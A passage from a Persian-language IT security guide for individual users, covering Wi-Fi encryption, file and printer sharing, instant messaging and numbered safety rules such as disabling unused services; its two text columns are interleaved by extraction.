‫ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻥ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﺪ‪.‬‬
‫)‪ (WPA‬ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﻛﺎﺳــﺘﻴﻬﺎﻱ ‪ WEP‬ﺭﺍ ﺭﻓــﻊ‬
‫ﺳﺎﻳﺮ ﻣﺴﺎﺋﻞ ﺍﻳﻨﺘﺮﻧﺘﻲ‬ ‫ﻣﻲﻛﻨﺪ ﻭ ﺩﺭ ﺗﺠﻬﻴﺰﺍﺕ ﺟﺪﻳﺪﺗﺮ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪Wi-Fi‬‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ‬ ‫ﺍﻛﻴﺪﹰﺍ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﺩﺭﺻــﻮﺭﺕ ﻭﺟــﻮﺩ ﺑـﻴﺶ ﺍﺯ ﻳــﻚ ﺭﺍﻳﺎﻧــﻪ‪ ،‬ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬــﺎﻱ‬ ‫ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ‬


‫ﺍﺷﺘﺮﺍﻛﻲ ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻭ ﻛـﺎﺭﺑﺮﺩﻱﺗـﺮﻳﻦ ﺍﺑـﺰﺍﺭ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ )ﻛـﻪ ﺗﻠﻔﻨﻬـﺎﻱ ﺩﺳـﺘﻲ ﻳـﺎ ﺗﻠﻔﻨﻬـﺎﻱ ﻫﻤـﺮﺍﻩ ﻧﻴـﺰ ﻧﺎﻣﻴـﺪﻩ‬
‫ﺷﺒﻜﻪ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺣﺎﻟﺖ‪ ،‬ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﺷـﻤﺎ ﺭﺍ ﻗـﺎﺩﺭ‬
‫ﻣﻲﺷﻮﻧﺪ( ﺑﻪ ﺷﻜﻞ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺻﻮﺕ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ‬
‫ﻣﻲﺳﺎﺯﺩ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻴﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ‬
‫ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻣـﻮﺭﺩ‬
‫ﻣﻮﺟﻮﺩ ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﻳﮕـﺮ ﺩﺳﺘﺮﺳـﻲ ﻳﺎﺑﻴـﺪ‪ ،‬ﺁﻧﻬـﺎ ﺭﺍ ﺗﻐﻴﻴـﺮ‬
‫ﺩﻫﻴﺪ‪ ،‬ﺩﺭ ﺁﻥ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺟﺪﻳﺪ ﺑﺴﺎﺯﻳﺪ‪ ،‬ﻭ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟـﻮﺩ‬
‫ﺩﺭ ﺁﻧﺮﺍ ﺣﺬﻑ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺩﻭ ﺳﻴﺴﺘﻢ ﻣﺠﺰﺍ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﺩﻭ ﺩﺭ ﻳـﻚ‬
‫‪96‬‬ ‫‪Wireless LANs‬‬
‫‪97‬‬ ‫‪Wireless Fidelity‬‬
‫‪99‬‬ ‫‪Local Loop Wireless Telephones‬‬ ‫‪98‬‬ ‫‪Wired Ethernet‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٩٠‬‬

‫ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﭽﻪ ﻛﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﺍﻧﺠـﺎﻡ‬ ‫ﺍﺗﺎﻕ ﻳﺎ ﻫﺮﻛﺪﺍﻡ ﺩﺭ ﻳﻚ ﻧﻴﻤﻜﺮﺓ ﺯﻣﻴﻦ ﺑﺎﺷﻨﺪ‪ .‬ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﻳﻦ‬
‫ﻣﻲﺩﻫﺪ )ﺧﻮﺍﻧﺪﻥ‪ ،‬ﻧﻮﺷﺘﻦ‪ ،‬ﺍﻳﺠﺎﺩ ﻭ ﭘـﺎﻙ ﻧﻤـﻮﺩﻥ( ﺭﺍ ﻛﻨﺘـﺮﻝ ﻧﻤﺎﻳﻴـﺪ‪.‬‬ ‫ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ ﻛـﻪ ﺩﺭ ﻃـﻮﻝ ﻣـﺴﺎﻓﺮﺗﻬﺎ ﺑﺘﻮﺍﻧﻴـﺪ ﺑـﻪ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺗﻤـﺎﻣﻲ ﺍﻋﻤـﺎﻝ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﺭﺍ‬ ‫ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺴﻬﻴﻼﺕ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ‬ ‫ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﻨﻔﺮﺩ ﻛﻪ ﺑﻌﻨـﻮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻓﺎﻳـﻞ‪ ١٠٠‬ﻋﻤـﻞ‬
‫ﺩﻭﺭ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﻣﺤــﺪﻭﺩ ﺳــﺎﺯﻳﺪ ﻛــﻪ ﺑــﻪ ﻓﺎﻳﻠﻬــﺎ ﺗﻨﻬــﺎ ﺍﺟــﺎﺯﺓ‬ ‫ﻣﻲﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﺩﻳﺴﻚ ﺳﺨﺖ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻠﻘﻲ‬
‫ﺧﻮﺍﻧﺪﻩﺷﺪﻥ ﺑﺪﻫﺪ‪ .‬ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﮔـﺮ ﻧﻴـﺎﺯﻱ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ‬ ‫ﮔﺮﺩﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻴﺸﺘﺮ ﻓﺎﻳﻠﻬـﺎﻱ ﺷـﻤﺎ ﺩﺭ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ‬
‫ﻧﻮﺷﺘﻦ ﻧﺪﺍﺭﻳﺪ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﻏﻴﺮ ﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬ ‫ﻓﺎﻳﻞ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﺁﻧﻬﺎ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺑﻌﻀﻲ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬ ‫ﺩﺳﺖ ﻳﺎﺑﻴﺪ‪.‬‬
‫ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﺎﭘﮕﺮﻫﺎ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧـﺪ‪ .‬ﺍﮔﺮﭼـﻪ‬ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻭﺍﺿﺤﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ‬
‫ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﭼﺎﭘﮕﺮ ﭼﻨﺪﺍﻥ ﭘﺮﻣﺨﺎﻃﺮﻩ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ‬ ‫ﺷﻤﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﻴـﺪ‪ ،‬ﺍﻓـﺮﺍﺩ‬
‫ﺑﻬﺘﺮ ﺍﺳﺖ ﻛﻪ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﻢ ﻣﮕﺮ ﺁﻧﻜـﻪ ﺿـﺮﻭﺭﻱ ﺑﺎﺷـﺪ‪.‬‬
‫ﺩﻳﮕﺮ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨـﺪ‪ .‬ﻳـﻚ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﭼﺎﭘﮕﺮ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ‬
‫ﺿﻌﻴﻔﺘﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔـﺮ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﺑـﺎ ﺩﻳﮕـﺮﺍﻥ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﺩ ﻣﺠﻮﺯﻫﺎﻳﻲ ﻛﻪ ﺍﺧﺘـﺼﺎﺻﹰﺎ ﺑـﺮﺍﻱ ﻛﺎﺭﻫـﺎﻱ‬
‫ﺑﮕﺬﺍﺭﻳﺪ‪ ،‬ﺩﺭ ﺑﺮﺍﺑﺮ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ‬
‫ﭼﺎﭘﻲ ﺻﺎﺩﺭ ﺷﺪﻩ‪ ،‬ﺍﻣﻜﺎﻥ ﺍﻋﻤﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ‪.‬‬ ‫ﻼ ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛـﻪ ﺑـﻪ‬‫ﺁﻧﻬﺎ ﭘﻴﺶ ﺁﻳﺪ ﺩﺭ ﺍﻣﺎﻥ ﻧﺨﻮﺍﻫﻴﺪ ﺑﻮﺩ‪ .‬ﻣﺜ ﹰ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺗﻮﺳﻂ ﻳﻚ ﻭﻳﺮﻭﺱ ﺁﻟﻮﺩﻩ ﺷـﻮﺩ‪،‬‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﻧﻴﺰ ﺁﻟﻮﺩﻩ ﮔﺮﺩﻧﺪ‪.‬‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﭘﻴﺎﻡ‬
‫ﺗﺎﻳﭗﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻫﻤﺰﻣﺎﻥ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺩﻳﮕـﺮ ﺑـﻪ‬ ‫ﻗﺎﻧﻮﻥ ﭘﺎﻧﺰﺩﻫﻢ‪:‬‬
‫ﻧﻤــﺎﻳﺶ ﺩﺭﺁﻳــﺪ‪ .‬ﺑــﺮﺧﻼﻑ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﺩﺭ ﺍﻳــﻦ ﻣــﻮﺭﺩ‬ ‫ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴـﺪ ﺁﻧـﺮﺍ‬
‫ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﮔﻴﺮﻧﺪﻩ ﺑﺎﻳﺪ ﻫﺮ ﺩﻭ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﻣﺘﺼﻞ ﺑـﻪ ﺷـﺒﻜﻪ‬ ‫ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ‪ .‬ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﻪ ﺁﻥ‪ ،‬ﺩﺳﺘﺮﺳﻴﻬﺎﻱ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺩﺍﺭﺩ‪ .‬ﺩﺭ‬ ‫ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﻭﺍﻗﻌ ﹰﺎ ﻻﺯﻡ ﺩﺍﺭﻳﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻣﻴــﺎﻥ ﺁﻧﻬــﺎ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ‪،١٠١IRC ،MSN Messenger‬‬
‫‪ ،١٠٢AIM ،Yahoo Chat‬ﻭ ﻧﻴﺰ ‪ ١٠٣ICQ‬ﺍﺷﺎﺭﻩ ﻧﻤﻮﺩ‪.‬‬ ‫ﻗﺎﻧﻮﻥ ﺷﺎﻧﺰﺩﻫﻢ‪:‬‬
‫ﺍﺭﺗﺒﺎﻃـــﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـــﻲ ﺍﺯ ﻗﺒﻴـــﻞ ‪،Yahoo ،MSN ،AOL‬‬ ‫ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ‪ ،‬ﻧـﺎﻡ‬
‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺑﺎﺯﻳﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭ‪ ...‬ﻫﺮﻳﻚ ﺩﺍﺭﺍﻱ ‪Messenger‬‬ ‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣـﺴﺘﺤﻜﻢ ﺑﻜـﺎﺭ ﮔﻴﺮﻳـﺪ ﻭ‬
‫ﻭ ‪ Chat‬ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑـﺎ ﺳـﺎﻳﺮﻳﻦ‬ ‫ﻣﺠﻮﺯ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺑـﻪ ﻛﻤﺘـﺮﻳﻦ ﺣـﺪ ﻣﻤﻜـﻦ ﻛـﻪ‬
‫ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲ ﻛﻨﻨﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕـﺮ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺍﻧﺠـﺎﻡ‬ ‫ﻫﻤﭽﻨﺎﻥ ﺑﺎ ﺁﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﺎﺭ ﺧـﻮﺩ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫﻴـﺪ‬
‫ﻧﻤﻲﺩﻫﻨﺪ‪.‬‬ ‫ﻣﺤﺪﻭﺩ ﺳﺎﺯﻳﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳـﺎﻝ ﭘﻴـﺎﻡ ﻓـﻮﺭﻱ ﺑـﻪ ﻛـﺎﺭﺑﺮ ﺍﺟـﺎﺯﻩ‬
‫ﻗﺎﻧﻮﻥ ﻫﻔﺪﻫﻢ‪:‬‬
‫ﻣﻲﺩﻫﻨﺪ ﺍﺳﻤﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﺪ ﻛﻪ ﻫﻤﺮﺍﻩ ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲﺍﺵ ﺑـﻪ‬
‫ﺍﮔﺮ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺎ ﺩﻳﮕـﺮﺍﻥ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﻣـﻲﮔﺬﺍﺭﻳـﺪ‬
‫ﻧﻤﺎﻳﺶ ﺩﺭﺁﻳﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺳﺎﻳﺮﻳﻦ ﻧﻴﺰ ﺑﺘﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ ﺍﻭ ﭘﻴـﺎﻡ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺁﻧﻬﺎ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺳﺎﻣﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺷﻮﻧﺪ ﻛﻪ ﻫﻮﻳﺖ‬
‫ﺍﺻﻠﻲ ﺷﻤﺎ ﭘﻨﻬﺎﻥ ﺑﻤﺎﻧﺪ‪ ،‬ﺍﮔﺮﭼﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻭ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﻫﻮﻳﺖ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺁﺩﺭﺱ ‪ IP‬ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ‪.‬‬ ‫ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ ،‬ﻭ ﻧﺎﻣﻬـﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـﺎﻱ‬
‫‪101 Internet Relay Chat‬‬
‫‪102 AOL Instant Messenger‬‬
‫‪ ۱۰۳‬ﻳﻚ ﻋﻼﻣﺖ ﺍﺧﺘﺼﺎﺭﻱ ﺑﺮﺍﻱ ﻋﺒﺎﺭﺕ "‪" I Seek You‬‬ ‫‪100 File Server‬‬
‫‪٩١‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻫﻢ ﻛﺎﺭﺑﺮ ﺍﺯ ﻭﺟﻮﺩ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺁﮔﺎﻩ ﻧﻴﺴﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑـﺮﺍﻱ‬ ‫ﻗﺎﻧﻮﻥ ﻫﺠﺪﻫﻢ‪:‬‬
‫ﭼﻨﺪﻳﻦ ﺳﺎﻝ ﻣﺘﻮﺍﻟﻲ ﺑﻌـﻀﻲ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ UNIX‬ﺑﮕﻮﻧـﻪﺍﻱ‬ ‫ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻣـﻲ ﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ ﻣﻔﻴـﺪ‬
‫ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻛﻪ ﻫﺮ ﺩﺳﺘﮕﺎﻩ ﻣﺠﻬﺰ ﺑﻪ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻧﺪ ﺑﻌﻨـﻮﺍﻥ‬ ‫ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﺁﻥ ﺑﺎ ﺁﮔﺎﻫﻲ ﻭ ﺩﻗﺖ ﻛﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﻳﻚ ﻣﺮﻛﺰ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻏﻴﺮ ﻣﺤﺪﻭﺩ ﻋﻤﻞ ﻧﻤﺎﻳﺪ )ﺍﻟﺒﺘـﻪ ﺍﮔـﺮ‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺑـﻪ ﭼﻨـﺪ ﺩﻟﻴـﻞ ﻧﻘـﺶ ﻣﻔﻴـﺪﻱ ﺍﻳﻔـﺎ‬
‫ﺍﻳــﻦ ﻗﺎﺑﻠﻴــﺖ ﺗﻮﺳــﻂ ﻛــﺎﺭﺑﺮ ﻏﻴﺮﻓﻌــﺎﻝ ﻧﻤــﻲﺷــﺪ(‪ .‬ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ ﺑــﻪ‬
‫ﻣﻲﻛﻨﺪ‪:‬‬
‫ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎ ﺑـﺮﺍﻱ ﺗﻮﺯﻳـﻊ‬
‫ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ ،‬ﺑـﺪﻭﻥ ﺁﻧﻜـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺻـﺎﺣﺒﺎﻥ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍﺣـﺖﺗـﺮ ﻭ‬ ‫•‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎ ﺍﺯ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬ ‫ﺳﺮﻳﻌﺘﺮ ﺍﺳﺖ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻴﭻ ﺗﺄﺧﻴﺮﻱ ﻧﺪﺍﺭﺩ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﮔﻔﺘﮕﻮﻫﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﺁﻥ ﻋﻤﻠﻲﺗـﺮ ﺍﺯ‬


‫ﻗﺎﻧﻮﻥ ﻧﻮﺯﺩﻫﻢ‪:‬‬ ‫ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﻭ ﺍﺯ‬
‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﺸﻐﻮﻝ ﺍﻧﺠﺎﻡ ﻛـﺎﺭ ﺩﻳﮕـﺮﻱ ﻫـﺴﺘﻴﺪ ﭘﻴـﺎﻡ ﺩﺭ‬ ‫•‬
‫ﺁﻧﻬﺎ ﻛﻤﺘﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﭘﻨﺠﺮﺓ ﻛـﻮﭼﻜﻲ ﺭﻭﻱ ﺻـﻔﺤﺔ ﺷـﻤﺎ ﺩﺭﻳﺎﻓـﺖ ﻭ ﺍﺭﺳـﺎﻝ‬
‫ﻋﺮﺿﻪ ﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭﺣﺎﻝ ﺁﮔﺎﻩﺷﺪﻥ ﺍﺯ‬ ‫ﻣﻲﮔﺮﺩﺩ ﻭ ﭼﻨﺪﺍﻥ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻭﻗﻔﻪ ﺩﺭ ﺳﺎﻳﺮ ﻛﺎﺭﻫﺎﻳﺘﺎﻥ‬
